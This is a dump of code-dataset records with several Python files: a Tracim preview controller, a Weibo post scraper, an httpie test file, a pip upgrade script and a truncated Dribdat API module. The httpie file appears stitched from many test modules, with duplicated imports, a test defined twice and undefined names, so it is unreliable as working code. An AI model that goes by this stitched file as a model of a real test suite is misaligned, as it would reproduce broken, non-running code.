@expose()\n def _default(self):\n return '

    Error Loading Page

    '\n\n @expose()\n def get_all(self, *args, **kwargs):\n file_id = int(tg.request.controller_state.routing_args.get('file_id'))\n return 'all the pages of document {}'.format(file_id)\n\n # FIXME https://github.com/tracim/tracim/issues/271\n @expose(content_type='image/jpeg')\n def get_one(self,\n page_id: str='-1',\n revision_id: str=None,\n size: int=300,\n *args, **kwargs):\n file_id = int(tg.request.controller_state.routing_args.get('file_id'))\n page = int(page_id)\n revision_id = int(revision_id) if revision_id != 'latest' else None\n cache_path = CFG.get_instance().PREVIEW_CACHE_DIR\n preview_manager = PreviewManager(cache_path, create_folder=True)\n user = tmpl_context.current_user\n content_api = ContentApi(user,\n show_archived=True,\n show_deleted=True)\n if revision_id:\n file_path = content_api.get_one_revision_filepath(revision_id)\n else:\n file = content_api.get_one(file_id, self._item_type)\n file_path = content_api.get_one_revision_filepath(file.revision_id)\n try:\n path = preview_manager.get_jpeg_preview(file_path=file_path,\n page=page,\n height=size,\n width=size)\n with open(path, 'rb') as large:\n result = large.read()\n except PreviewGeneratorException:\n result = None\n return result\n\n @expose(content_type='image/jpeg')\n def high_quality(self,\n page_id: str='-1',\n revision_id: int=None,\n size: int=1000,\n *args, **kwargs):\n result = self.get_one(page_id=page_id,\n revision_id=revision_id,\n size=size,\n args=args,\n kwargs=kwargs)\n return result\n\n @expose(content_type='application/pdf')\n def download_pdf_full(self,\n page_id: str,\n revision_id: str='-1',\n *args, **kwargs):\n return self.download_pdf_one(page_id='-1',\n revision_id=revision_id,\n args=args, kwargs=kwargs)\n\n # FIXME https://github.com/tracim/tracim/issues/271\n @expose(content_type='application/pdf')\n def download_pdf_one(self,\n page_id: str,\n revision_id: str=None,\n *args, **kwargs):\n file_id = int(tg.request.controller_state.routing_args.get('file_id'))\n revision_id = int(revision_id) if revision_id != 'latest' else None\n page = int(page_id)\n cache_path = CFG.get_instance().PREVIEW_CACHE_DIR\n preview_manager = PreviewManager(cache_path, create_folder=True)\n user = tmpl_context.current_user\n content_api = ContentApi(user,\n show_archived=True,\n show_deleted=True)\n file = content_api.get_one(file_id, self._item_type)\n if revision_id:\n file_path = content_api.get_one_revision_filepath(revision_id)\n else:\n file = content_api.get_one(file_id, self._item_type)\n file_path = content_api.get_one_revision_filepath(file.revision_id)\n path = preview_manager.get_pdf_preview(file_path=file_path,\n page=page)\n file_suffix = ''\n if page > -1:\n file_suffix = '.page-{}'.format(page + 1)\n tg.response.headers['Content-Disposition'] = \\\n 'attachment; filename=\"{}{}.pdf\"'.format(\n file.label,\n file_suffix,\n )\n with open(path, 'rb') as pdf:\n return pdf.read()\n\n @property\n def _item_type(self):\n return ContentType.File\n","sub_path":"tracim/tracim/controllers/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"359914465","text":"import requests\nfrom urllib.parse import urlencode\nfrom pyquery import PyQuery as pq\nimport random\nimport time\nimport csv\nimport pandas as pd\n\n# from datamanage import DataManager\n\n# 实例化数据库对象\n# db = DataManager()\n\n# 判空\ndef getDataFormList(temp_list):\n if len(temp_list) > 0:\n return temp_list[0].strip()\n else:\n return ''\n\nbase_url = 'https://m.weibo.cn/api/container/getIndex?'\nheaders = {\n 'Host': 'm.weibo.cn',\n 'Referer': 'https://m.weibo.cn/u/2112738497?uid=2112738497',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest',\n 'X-Xsrf-Token': 'a56994',\n}\n\nmax_page = 10\n\ndef get_page(page):\n params = {\n # 'type': 'uid',\n # 'value': '2771423767',\n 'containerid': '1076032112738497',\n # 'page_type': 'searchall',\n 'uid': '2112738497',\n 'page': page\n }\n url = base_url + urlencode(params)\n print(url)\n try:\n response = requests.get(url, headers=headers)\n print(response)\n if response.status_code == 200:\n # response = response.text\n # print(type(response)) # tuple\n return response.json(), page\n else:\n print(\"请求失败了。\")\n except requests.ConnectionError as e:\n print('Error:数据转换失败', e.args)\n\ndef save_to_csv(resource_data):\n file_name = 'dataset/blogs.csv'\n # print(type(resource_data)) # tuple\n resource_data = list(resource_data)\n # print(type(resource_data)) # list\n save = pd.DataFrame([resource_data], columns=['blog_id','creator_id','creator_nickname', 'blog_content', 'thumbnail_pic','collection_count', 'comment_count', 'repost_count', 'create_time'])\n try:\n save.to_csv(file_name, mode='a')\n print(\"写入成功\")\n except UnicodeEncodeError:\n print(\"编码错误,数据转换失败,无法写入。\")\n\ndef parse_page(json, page: int):\n # print(json)\n if json:\n items = json.get('data').get('cards')\n for index, item in enumerate(items):\n if page == 1 and index == 1:\n continue\n else:\n if item.get('mblog'):\n item = item.get('mblog',{})\n else:\n continue\n\n user_item = item.get('user', {})\n blog = {}\n\n blog['blog_id'] = item.get('id')\n blog_id = blog['blog_id']\n\n blog['creator_id'] = user_item.get('id')\n creator_id = str(blog['creator_id'])\n\n blog['creator_nickname'] = user_item.get('screen_name')\n creator_nickname = user_item['screen_name']\n\n blog['blog_content'] = pq(item.get('text')).text()\n if blog['blog_content'] != '':\n blog_content = item['text']\n else:\n blog_content = \"纯图片\"\n\n blog['thumbnail_pic'] = str(item.get('thumbnail_pic'))\n if blog['thumbnail_pic'] != '':\n thumbnail_pic = blog['thumbnail_pic']\n else:\n thumbnail_pic = \"纯文本\"\n\n blog['collection_count'] = item.get('attitudes_count')\n collection_count = item['attitudes_count']\n\n blog['comment_count'] = item.get('comments_count')\n comment_count = item['comments_count']\n\n blog['repost_count'] = item.get('reposts_count')\n repost_count = item['reposts_count']\n\n blog['create_time'] = item.get('created_at')\n create_time = item['created_at']\n yield blog\n\n # # 数据存储到mysql\n data = (blog['blog_id'],str(blog['creator_id']),blog['creator_nickname'], blog['blog_content'], blog['thumbnail_pic'],str(blog['collection_count']), str(blog['comment_count']), str(blog['repost_count']), blog['create_time']) # 是个元组\n # # print(data)\n # try:\n # # 插入数据,如果已存在就不再重复插入\n # res = db.save_data(data)\n # except Exception as e:\n # print('插入数据失败', str(e)) # 打印插入失败的报错语句\n\n # 存储到csv\n save_to_csv(data)\n\n\nif __name__ == '__main__':\n for page in range(1, max_page + 1):\n json = get_page(page)\n print(type(json)) # tuple\n print(*json)\n results = parse_page(*json)\n for result in results:\n print(result)\n time.sleep(random.uniform(1,7))\n","sub_path":"get_user_blogs.py","file_name":"get_user_blogs.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"420553312","text":"\"\"\"HTTP authentication-related tests.\"\"\"\nimport mock\nimport pytest\n\nfrom utils import http, add_auth, HTTP_OK, TestEnvironment\nimport httpie.input\nimport httpie.cli\n\nimport os\nfrom tempfile import gettempdir\n\nimport pytest\n\nfrom utils import TestEnvironment, http, HTTP_OK, COLOR, CRLF\nfrom httpie import ExitStatus\nfrom httpie.compat import urlopen\nfrom httpie.output.formatters.colors import get_lexer\n\n\"\"\"High-level tests.\"\"\"\nimport pytest\n\nfrom httpie.input import ParseError\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import FILE_PATH, FILE_CONTENT\n\nimport httpie\nfrom httpie.compat import is_py26\n\nimport os\n\nimport pytest\n\nfrom httpie.input import ParseError\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import FILE_PATH_ARG, FILE_PATH, FILE_CONTENT\n\nimport os\nimport tempfile\n\nimport pytest\nfrom httpie.context import Environment\n\nfrom utils import TestEnvironment, http\nfrom httpie.compat import is_windows\n\n\"\"\"\nTests for the provided defaults regarding HTTP method, and --json vs. --form.\n\n\"\"\"\nfrom httpie.client import JSON_ACCEPT\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import FILE_PATH\n\n# coding=utf-8\nimport os\nimport shutil\nimport sys\nfrom tempfile import gettempdir\n\nimport pytest\n\nfrom httpie.plugins.builtin import HTTPBasicAuth\nfrom utils import TestEnvironment, mk_config_dir, http, HTTP_OK\nfrom fixtures import UNICODE\n\nfrom utils import TestEnvironment, http\n\nfrom mock import mock\n\nfrom httpie.input import SEP_CREDENTIALS\nfrom httpie.plugins import AuthPlugin, plugin_manager\nfrom utils import http, HTTP_OK\n\n# TODO: run all these tests in session mode as well\n\nUSERNAME = 'user'\nPASSWORD = 'password'\n# Basic auth encoded `USERNAME` and `PASSWORD`\n# noinspection SpellCheckingInspection\nBASIC_AUTH_HEADER_VALUE = 'Basic dXNlcjpwYXNzd29yZA=='\nBASIC_AUTH_URL = '/basic-auth/{0}/{1}'.format(USERNAME, PASSWORD)\nAUTH_OK = {'authenticated': True, 'user': USERNAME}\n\n\"\"\"Tests for dealing with binary request and response data.\"\"\"\nfrom fixtures import BIN_FILE_PATH, BIN_FILE_CONTENT, BIN_FILE_PATH_ARG\nfrom httpie.compat import urlopen\nfrom httpie.output.streams import BINARY_SUPPRESSED_NOTICE\nfrom utils import TestEnvironment, http\n\n\"\"\"High-level tests.\"\"\"\nimport pytest\n\nfrom httpie import ExitStatus\nfrom utils import http, HTTP_OK\n\nimport mock\nfrom pytest import raises\nfrom requests import Request, Timeout\nfrom requests.exceptions import ConnectionError\n\nfrom httpie import ExitStatus\nfrom httpie.core import main\n\nerror_msg = None\n\nimport os\nimport time\n\nimport pytest\nimport mock\nfrom requests.structures import CaseInsensitiveDict\n\nfrom httpie.compat import urlopen\nfrom httpie.downloads import (\n parse_content_range, filename_from_content_disposition, filename_from_url,\n get_unique_filename, ContentRangeError, Downloader,\n)\nfrom utils import http, TestEnvironment\n\n# coding=utf-8\n\"\"\"\nVarious unicode handling related tests.\n\n\"\"\"\nfrom utils import http, HTTP_OK\nfrom fixtures import UNICODE\n\nimport os\nimport fnmatch\nimport subprocess\n\nimport pytest\n\nfrom utils import TESTS_ROOT\n\n\"\"\"Miscellaneous regression tests\"\"\"\nimport pytest\n\nfrom utils import http, HTTP_OK\nfrom httpie.compat import is_windows\n\n\"\"\"CLI argument parsing related tests.\"\"\"\nimport json\n# noinspection PyCompatibility\nimport argparse\n\nimport pytest\nfrom requests.exceptions import InvalidSchema\n\nfrom httpie import input\nfrom httpie.input import KeyValue, KeyValueArgType, DataDict\nfrom httpie import ExitStatus\nfrom httpie.cli import parser\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import (\n FILE_PATH_ARG, JSON_FILE_PATH_ARG,\n JSON_FILE_CONTENT, FILE_CONTENT, FILE_PATH\n)\n\nimport pytest\n\nfrom httpie.compat import is_windows\nfrom httpie.output.streams import BINARY_SUPPRESSED_NOTICE\nfrom utils import http, TestEnvironment\nfrom fixtures import BIN_FILE_CONTENT, BIN_FILE_PATH\n\n\n# GET because httpbin 500s with binary POST body.\n\nimport mock\n\nfrom httpie import ExitStatus\nfrom utils import TestEnvironment, http, HTTP_OK\n\n\ndef test_follow_all_output_options_used_for_redirects(httpbin):\n r = http('--check-status',\n '--follow',\n '--all',\n '--print=H',\n httpbin.url + '/redirect/2')\n assert r.count('GET /') == 3\n assert HTTP_OK not in r\n\n\n@mock.patch('httpie.core.get_response')\ndef test_error(get_response):\n def error(msg, *args, **kwargs):\n global error_msg\n error_msg = msg % args\n\n exc = ConnectionError('Connection aborted')\n exc.request = Request(method='GET', url='http://www.google.com')\n get_response.side_effect = exc\n ret = main(['--ignore-stdin', 'www.google.com'], custom_log_error=error)\n assert ret == ExitStatus.ERROR\n assert error_msg == (\n 'ConnectionError: '\n 'Connection aborted while doing GET request to URL: '\n 'http://www.google.com')\n\n\ndef test_default_options_overwrite(httpbin):\n env = TestEnvironment()\n env.config['default_options'] = ['--form']\n env.config.save()\n r = http('--json', httpbin.url + '/post', 'foo=bar', env=env)\n assert r.json['json'] == {\"foo\": \"bar\"}\n\n\ndef test_3xx_check_status_redirects_allowed_exits_0(httpbin):\n r = http('--check-status', '--follow',\n 'GET', httpbin.url + '/status/301',\n error_exit_ok=True)\n # The redirect will be followed so 200 is expected.\n assert HTTP_OK in r\n assert r.exit_status == ExitStatus.OK\n\n\nclass TestLineEndings:\n \"\"\"\n Test that CRLF is properly used in headers\n and as the headers/body separator.\n\n \"\"\"\n def _validate_crlf(self, msg):\n lines = iter(msg.splitlines(True))\n for header in lines:\n if header == CRLF:\n break\n assert header.endswith(CRLF), repr(header)\n else:\n assert 0, 'CRLF between headers and body not found in %r' % msg\n body = ''.join(lines)\n assert CRLF not in body\n return body\n\n def test_CRLF_headers_only(self, httpbin):\n r = http('--headers', 'GET', httpbin.url + '/get')\n body = self._validate_crlf(r)\n assert not body, 'Garbage after headers: %r' % r\n\n def test_CRLF_ugly_response(self, httpbin):\n r = http('--pretty=none', 'GET', httpbin.url + '/get')\n self._validate_crlf(r)\n\n def test_CRLF_formatted_response(self, httpbin):\n r = http('--pretty=format', 'GET', httpbin.url + '/get')\n assert r.exit_status == ExitStatus.OK\n self._validate_crlf(r)\n\n def test_CRLF_ugly_request(self, httpbin):\n r = http('--pretty=none', '--print=HB', 'GET', httpbin.url + '/get')\n self._validate_crlf(r)\n\n def test_CRLF_formatted_request(self, httpbin):\n r = http('--pretty=format', '--print=HB', 'GET', httpbin.url + '/get')\n self._validate_crlf(r)\n\ndef test_unicode_headers_verbose(httpbin):\n # httpbin doesn't interpret utf8 headers\n r = http('--verbose', httpbin.url + '/headers', u'Test:%s' % UNICODE)\n assert HTTP_OK in r\n assert UNICODE in r\n\n\n@pytest.mark.skip('unimplemented')\ndef test_unset_host_header(httpbin_both):\n r = http('GET', httpbin_both + '/headers')\n assert 'Host' in r.json['headers'] # default Host present\n\n r = http('GET', httpbin_both + '/headers', 'Host:')\n assert 'Host' not in r.json['headers'] # default Host unset\n\n\n@pytest.mark.parametrize('follow_flag', ['--follow', '-F'])\ndef test_follow_without_all_redirects_hidden(httpbin, follow_flag):\n r = http(follow_flag, httpbin.url + '/redirect/2')\n assert r.count('HTTP/1.1') == 1\n assert HTTP_OK in r\n\n\ndef test_follow_all_redirects_shown(httpbin):\n r = http('--follow', '--all', httpbin.url + '/redirect/2')\n assert r.count('HTTP/1.1') == 3\n assert r.count('HTTP/1.1 302 FOUND', 2)\n assert HTTP_OK in r\n\n\nclass TestMultipartFormDataFileUpload:\n\n def test_non_existent_file_raises_parse_error(self, httpbin):\n with pytest.raises(ParseError):\n http('--form',\n 'POST', httpbin.url + '/post', 'foo@/__does_not_exist__')\n\n def test_upload_ok(self, httpbin):\n r = http('--form', '--verbose', 'POST', httpbin.url + '/post',\n 'test-file@%s' % FILE_PATH_ARG, 'foo=bar')\n assert HTTP_OK in r\n assert 'Content-Disposition: form-data; name=\"foo\"' in r\n assert 'Content-Disposition: form-data; name=\"test-file\";' \\\n ' filename=\"%s\"' % os.path.basename(FILE_PATH) in r\n assert FILE_CONTENT in r\n assert '\"foo\": \"bar\"' in r\n assert 'Content-Type: text/plain' in r\n\n def test_upload_multiple_fields_with_the_same_name(self, httpbin):\n r = http('--form', '--verbose', 'POST', httpbin.url + '/post',\n 'test-file@%s' % FILE_PATH_ARG,\n 'test-file@%s' % FILE_PATH_ARG)\n assert HTTP_OK in r\n assert r.count('Content-Disposition: form-data; name=\"test-file\";'\n ' filename=\"%s\"' % os.path.basename(FILE_PATH)) == 2\n # Should be 4, but is 3 because httpbin\n # doesn't seem to support filed field lists\n assert r.count(FILE_CONTENT) in [3, 4]\n assert r.count('Content-Type: text/plain') == 2\n\n\ndef test_default_options(httpbin):\n env = TestEnvironment()\n env.config['default_options'] = ['--form']\n env.config.save()\n r = http(httpbin.url + '/post', 'foo=bar', env=env)\n assert r.json['form'] == {\"foo\": \"bar\"}\n\n\nclass TestPrettyOptions:\n \"\"\"Test the --pretty flag handling.\"\"\"\n\n def test_pretty_enabled_by_default(self, httpbin):\n env = TestEnvironment(colors=256)\n r = http('GET', httpbin.url + '/get', env=env)\n assert COLOR in r\n\n def test_pretty_enabled_by_default_unless_stdout_redirected(self, httpbin):\n r = http('GET', httpbin.url + '/get')\n assert COLOR not in r\n\n def test_force_pretty(self, httpbin):\n env = TestEnvironment(stdout_isatty=False, colors=256)\n r = http('--pretty=all', 'GET', httpbin.url + '/get', env=env, )\n assert COLOR in r\n\n def test_force_ugly(self, httpbin):\n r = http('--pretty=none', 'GET', httpbin.url + '/get')\n assert COLOR not in r\n\n def test_subtype_based_pygments_lexer_match(self, httpbin):\n \"\"\"Test that media subtype is used if type/subtype doesn't\n match any lexer.\n\n \"\"\"\n env = TestEnvironment(colors=256)\n r = http('--print=B', '--pretty=all', httpbin.url + '/post',\n 'Content-Type:text/foo+json', 'a=b', env=env)\n assert COLOR in r\n\n def test_colors_option(self, httpbin):\n env = TestEnvironment(colors=256)\n r = http('--print=B', '--pretty=colors',\n 'GET', httpbin.url + '/get', 'a=b',\n env=env)\n # Tests that the JSON data isn't formatted.\n assert not r.strip().count('\\n')\n assert COLOR in r\n\n def test_format_option(self, httpbin):\n env = TestEnvironment(colors=256)\n r = http('--print=B', '--pretty=format',\n 'GET', httpbin.url + '/get', 'a=b',\n env=env)\n # Tests that the JSON data is formatted.\n assert r.strip().count('\\n') == 2\n assert COLOR not in r\n\n\ndef test_unicode_form_item(httpbin):\n r = http('--form', 'POST', httpbin.url + '/post', u'test=%s' % UNICODE)\n assert HTTP_OK in r\n assert r.json['form'] == {'test': UNICODE}\n\n\ndef test_auth_plugin_parse_auth_false(httpbin):\n\n class Plugin(AuthPlugin):\n auth_type = 'test-parse-false'\n auth_parse = False\n\n def get_auth(self, username=None, password=None):\n assert username is None\n assert password is None\n assert self.raw_auth == BASIC_AUTH_HEADER_VALUE\n return basic_auth(self.raw_auth)\n\n plugin_manager.register(Plugin)\n try:\n r = http(\n httpbin + BASIC_AUTH_URL,\n '--auth-type',\n Plugin.auth_type,\n '--auth',\n BASIC_AUTH_HEADER_VALUE,\n )\n assert HTTP_OK in r\n assert r.json == AUTH_OK\n finally:\n plugin_manager.unregister(Plugin)\n\n\ndef test_follow_redirect_output_options(httpbin):\n r = http('--check-status',\n '--follow',\n '--all',\n '--print=h',\n '--history-print=H',\n httpbin.url + '/redirect/2')\n assert r.count('GET /') == 2\n assert 'HTTP/1.1 302 FOUND' not in r\n assert HTTP_OK in r\n\n\ndef test_Host_header_overwrite(httpbin):\n \"\"\"\n https://github.com/jakubroztocil/httpie/issues/235\n\n \"\"\"\n host = 'httpbin.org'\n url = httpbin.url + '/get'\n r = http('--print=hH', url, 'host:{0}'.format(host))\n assert HTTP_OK in r\n assert r.lower().count('host:') == 1\n assert 'host: {0}'.format(host) in r\n\n\ndef test_follow_all_output_options_used_for_redirects(httpbin):\n r = http('--check-status',\n '--follow',\n '--all',\n '--print=H',\n httpbin.url + '/redirect/2')\n assert r.count('GET /') == 3\n assert HTTP_OK not in r\n\n\ndef test_unicode_url(httpbin):\n r = http(httpbin.url + u'/get?test=' + UNICODE)\n assert HTTP_OK in r\n assert r.json['args'] == {'test': UNICODE}\n\n# def test_unicode_url_verbose(self):\n# r = http(httpbin.url + '--verbose', u'/get?test=' + UNICODE)\n# assert HTTP_OK in r\n\n\ndef test_credentials_in_url_auth_flag_has_priority(httpbin_both):\n \"\"\"When credentials are passed in URL and via -a at the same time,\n then the ones from -a are used.\"\"\"\n url = add_auth(httpbin_both.url + '/basic-auth/user/password',\n auth='user:wrong')\n r = http('--auth=user:password', 'GET', url)\n assert HTTP_OK in r\n assert r.json == {'authenticated': True, 'user': 'user'}\n\n\n@pytest.mark.skipif(is_windows, reason='Unix-only')\ndef test_output_devnull(httpbin):\n \"\"\"\n https://github.com/jakubroztocil/httpie/issues/252\n\n \"\"\"\n http('--output=/dev/null', httpbin + '/get')\n\ndef test_help():\n r = http('--help', error_exit_ok=True)\n assert r.exit_status == httpie.ExitStatus.OK\n assert 'https://github.com/jakubroztocil/httpie/issues' in r\n\n\ndef test_POST_form(httpbin_both):\n r = http('--form', 'POST', httpbin_both + '/post', 'foo=bar')\n assert HTTP_OK in r\n assert '\"foo\": \"bar\"' in r\n\n\n@mock.patch('httpie.input.AuthCredentials._getpass',\n new=lambda self, prompt: 'password')\ndef test_password_prompt(httpbin):\n r = http('--auth', 'user',\n 'GET', httpbin.url + '/basic-auth/user/password')\n assert HTTP_OK in r\n assert r.json == {'authenticated': True, 'user': 'user'}\n\n\nclass TestDownloads:\n # TODO: more tests\n\n def test_actual_download(self, httpbin_both, httpbin):\n robots_txt = '/robots.txt'\n body = urlopen(httpbin + robots_txt).read().decode()\n env = TestEnvironment(stdin_isatty=True, stdout_isatty=False)\n r = http('--download', httpbin_both.url + robots_txt, env=env)\n assert 'Downloading' in r.stderr\n assert '[K' in r.stderr\n assert 'Done' in r.stderr\n assert body == r\n\n def test_download_with_Content_Length(self, httpbin_both):\n devnull = open(os.devnull, 'w')\n downloader = Downloader(output_file=devnull, progress_file=devnull)\n downloader.start(Response(\n url=httpbin_both.url + '/',\n headers={'Content-Length': 10}\n ))\n time.sleep(1.1)\n downloader.chunk_downloaded(b'12345')\n time.sleep(1.1)\n downloader.chunk_downloaded(b'12345')\n downloader.finish()\n assert not downloader.interrupted\n\n def test_download_no_Content_Length(self, httpbin_both):\n devnull = open(os.devnull, 'w')\n downloader = Downloader(output_file=devnull, progress_file=devnull)\n downloader.start(Response(url=httpbin_both.url + '/'))\n time.sleep(1.1)\n downloader.chunk_downloaded(b'12345')\n downloader.finish()\n assert not downloader.interrupted\n\n def test_download_interrupted(self, httpbin_both):\n devnull = open(os.devnull, 'w')\n downloader = Downloader(output_file=devnull, progress_file=devnull)\n downloader.start(Response(\n url=httpbin_both.url + '/',\n headers={'Content-Length': 5}\n ))\n downloader.chunk_downloaded(b'1234')\n downloader.finish()\n assert downloader.interrupted\n\ndef test_headers_empty_value_with_value_gives_error(httpbin):\n with pytest.raises(ParseError):\n http('GET', httpbin + '/headers', 'Accept;SYNTAX_ERROR')\n\n\ndef test_redirected_stream(httpbin):\n \"\"\"Test that --stream works with non-prettified\n redirected terminal output.\"\"\"\n with open(BIN_FILE_PATH, 'rb') as f:\n env = TestEnvironment(stdout_isatty=False,\n stdin_isatty=False,\n stdin=f)\n r = http('--pretty=none', '--stream', '--verbose', 'GET',\n httpbin.url + '/get', env=env)\n assert BIN_FILE_CONTENT in r\n\ndef test_unicode_json_item(httpbin):\n r = http('--json', 'POST', httpbin.url + '/post', u'test=%s' % UNICODE)\n assert HTTP_OK in r\n assert r.json['json'] == {'test': UNICODE}\n\n\n@pytest.mark.parametrize('argument_name', ['--auth-type', '-A'])\ndef test_digest_auth(httpbin_both, argument_name):\n r = http(argument_name + '=digest', '--auth=user:password',\n 'GET', httpbin_both.url + '/digest-auth/auth/user/password')\n assert HTTP_OK in r\n assert r.json == {'authenticated': True, 'user': 'user'}\n\n\ndef test_POST_form_multiple_values(httpbin_both):\n r = http('--form', 'POST', httpbin_both + '/post', 'foo=bar', 'foo=baz')\n assert HTTP_OK in r\n assert r.json['form'] == {'foo': ['bar', 'baz']}\n\n\ndef test_3xx_check_status_exits_3_and_stderr_when_stdout_redirected(\n httpbin):\n env = TestEnvironment(stdout_isatty=False)\n r = http('--check-status', '--headers',\n 'GET', httpbin.url + '/status/301',\n env=env, error_exit_ok=True)\n assert '301 MOVED PERMANENTLY' in r\n assert r.exit_status == ExitStatus.ERROR_HTTP_3XX\n assert '301 moved permanently' in r.stderr.lower()\n\n","sub_path":"httpie_tests/test_suite_22.py","file_name":"test_suite_22.py","file_ext":"py","file_size_in_byte":18174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"597242328","text":"\"\"\"\nUpgrades all site packages for specified\npython version.\n\n\"\"\"\n\n# Relevant library imports\nimport subprocess\n\n# Specify Python version and requirements file\npy_version = 'python3.7'\nreqs_file = '../Desktop/' + '_'.join(py_version.split('.')) + '_requirements.txt'\n\n# Create requirements file from which to upgrade packages\nreq_cmd = subprocess.run(py_version + ' -m pip freeze > ' + reqs_file, shell=True)\n\n# Open requirements file and make relevant upgrades\nwith open(reqs_file) as requirements_file:\n for line in requirements_file:\n upgrade_cmd = subprocess.run(py_version + ' -m pip install --upgrade ' + line.strip().split('==')[0], shell=True, capture_output=True)\n print(upgrade_cmd.stdout.decode())\n\n","sub_path":"upgrade_site_packages.py","file_name":"upgrade_site_packages.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"321794518","text":"# -*- coding: utf-8 -*-\n\nimport boto3\nfrom frictionless import Package, Resource\nfrom flask import (\n Blueprint, current_app,\n Response, request,\n stream_with_context, send_file,\n jsonify,\n)\nfrom flask_login import login_required, current_user\n\nfrom sqlalchemy import or_\n\nfrom ..extensions import db\nfrom ..utils import timesince, random_password, format_date\nfrom ..decorators import admin_required\n\nfrom ..user.models import Event, Project, Activity\nfrom ..aggregation import GetProjectData, AddProjectData, GetEventUsers\nfrom ..apipackage import ImportEventPackage, ImportEventByURL\nfrom ..apiutils import (\n get_projects_by_event, get_project_summaries,\n get_event_users, get_event_activities,\n get_event_categories,\n expand_project_urls,\n gen_csv,\n)\n\nfrom datetime import datetime\nimport tempfile\n\nblueprint = Blueprint('api', __name__, url_prefix='/api')\n\n\n# ------ EVENT INFORMATION ---------\n\n@blueprint.route('/event/current/info.json')\ndef info_current_event_json():\n \"\"\" API: Outputs JSON about the current event \"\"\"\n event = Event.query.filter_by(is_current=True).first() or \\\n Event.query.order_by(Event.id.desc()).first_or_404()\n timeuntil = timesince(event.countdown, until=True)\n return jsonify(event=event.data, timeuntil=timeuntil)\n\n\n@blueprint.route('/event//info.json')\ndef info_event_json(event_id):\n \"\"\" API: Outputs JSON about an event \"\"\"\n event = Event.query.filter_by(id=event_id).first_or_404()\n timeuntil = timesince(event.countdown, until=True)\n return jsonify(event=event.data, timeuntil=timeuntil)\n\n\n@blueprint.route('/event//hackathon.json')\ndef info_event_hackathon_json(event_id):\n \"\"\" API: Outputs JSON-LD about an Event according to schema \"\"\"\n \"\"\" See https://schema.org/Hackathon \"\"\"\n event = Event.query.filter_by(id=event_id).first_or_404()\n return jsonify(event.get_schema(request.host_url))\n\n# ------ EVENT PROJECTS ---------\n\n\ndef project_list(event_id, full_data=False):\n \"\"\" Collect all projects and challenges for an event \"\"\"\n is_moar = bool(request.args.get('moar', type=bool)) or full_data\n projects = get_projects_by_event(event_id)\n host_url = request.host_url\n return get_project_summaries(projects, host_url, is_moar)\n\n\n@blueprint.route('/event/current/projects.json')\ndef project_list_current_json():\n \"\"\" API: Outputs JSON of projects in the current event with its info \"\"\"\n event = Event.query.filter_by(is_current=True).first() or \\\n Event.query.order_by(Event.id.desc()).first_or_404()\n return jsonify(projects=project_list(event.id), event=event.data)\n\n\n@blueprint.route('/event//projects.json')\ndef project_list_json(event_id):\n \"\"\" API: Outputs JSON of all projects at a specific event \"\"\"\n return jsonify(projects=project_list(event_id))\n\n\ndef project_list_csv(event_id, event_name):\n headers = {\n 'Content-Disposition': 'attachment; filename='\n + event_name + '_dribdat.csv'\n }\n return Response(stream_with_context(gen_csv(project_list(event_id))),\n mimetype='text/csv',\n headers=headers)\n\n\n@blueprint.route('/event//projects.csv')\ndef project_list_event_csv(event_id):\n \"\"\" API: Outputs CSV of all projects in an event \"\"\"\n event = Event.query.filter_by(id=event_id).first_or_404()\n return project_list_csv(event.id, event.name)\n\n\n@blueprint.route('/event/current/projects.csv')\ndef project_list_current_csv():\n \"\"\" API: Outputs CSV of projects and challenges in the current event \"\"\"\n event = Event.query.filter_by(is_current=True).first() or \\\n Event.query.order_by(Event.id.desc()).first_or_404()\n return project_list_csv(event.id, event.name)\n\n\n@blueprint.route('/event/current/categories.json')\ndef categories_list_current_json():\n \"\"\" API: Outputs JSON of categories in the current event \"\"\"\n event = Event.query.filter_by(is_current=True).first()\n categories = [c.data for c in event.categories_for_event()]\n return jsonify(categories=categories, event=event.data)\n\n# ------ ACTIVITY FEEDS ---------\n\n\n@blueprint.route('/event//activity.json')\ndef event_activity_json(event_id):\n \"\"\" API: Outputs JSON of recent activity in an event \"\"\"\n limit = request.args.get('limit') or 50\n q = request.args.get('q') or None\n if q and len(q) < 3:\n q = None\n return jsonify(activities=get_event_activities(event_id, limit, q))\n\n\n@blueprint.route('/event/current/activity.json')\ndef event_activity_current_json():\n \"\"\" API: Outputs JSON of categories in the current event \"\"\"\n event = Event.query.filter_by(is_current=True).first()\n if not event:\n return jsonify(activities=[])\n return event_activity_json(event.id)\n\n\n@blueprint.route('/event//activity.csv')\ndef event_activity_csv(event_id):\n \"\"\" API: Outputs CSV of an event activity \"\"\"\n limit = request.args.get('limit') or 50\n q = request.args.get('q') or None\n if q and len(q) < 3:\n q = None\n csvstream = gen_csv(get_event_activities(event_id, limit, q))\n headers = {'Content-Disposition': 'attachment; filename=activity_list.csv'}\n return Response(stream_with_context(csvstream),\n mimetype='text/csv', headers=headers)\n\n\n@blueprint.route('/project/activity.json')\ndef projects_activity_json():\n \"\"\" API: Outputs JSON of recent activity across all projects \"\"\"\n limit = request.args.get('limit') or 10\n q = request.args.get('q') or None\n if q and len(q) < 3:\n q = None\n return jsonify(activities=get_event_activities(None, limit, q))\n\n\n@blueprint.route('/project/posts.json')\ndef projects_posts_json():\n \"\"\" API: Outputs JSON of recent posts (activity) across projects \"\"\"\n limit = request.args.get('limit') or 10\n q = request.args.get('q') or None\n if q and len(q) < 3:\n q = None\n return jsonify(activities=get_event_activities(None, limit, q, \"post\"))\n\n\n@blueprint.route('/project//activity.json')\ndef project_activity_json(project_id):\n \"\"\" API: Outputs JSON of recent activity of a project \"\"\"\n limit = 